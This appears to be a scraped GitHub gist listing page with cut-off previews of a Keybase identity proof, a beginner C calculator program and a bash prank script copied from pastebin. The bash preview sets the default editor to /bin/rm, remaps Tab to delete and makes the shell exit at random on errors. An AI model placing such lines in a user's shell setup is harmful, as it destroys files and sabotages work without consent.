I hereby claim:
- I am feliix42 on github.
- I am feliix42 (https://keybase.io/feliix42) on keybase.
- I have a public key ASDLyWHCzeLjuZTMpKseIPBKOBZ4kUCaDFr0TA66tojnMgo
To claim this, I am signing this object:
| #!/usr/bin/env bash | |
| # Originally found on pastebin: https://pastebin.com/zBHrudM5 | |
| # Set `rm` as the default editor. | |
| export EDITOR=/bin/rm; | |
| # Make Tab send the delete key. | |
| tset -Qe $'\t'; | |
| # Randomly make the shell exit whenever a command has a non-zero exit status. |
I hereby claim:
To claim this, I am signing this object:
| #include <stdio.h> | |
| int main(void) { | |
| int a, b; | |
| char operation; | |
| // get the numbers from the console | |
| printf("Enter the first number: "); | |
| scanf("%d", &a); | |
| printf("Enter the second number: "); |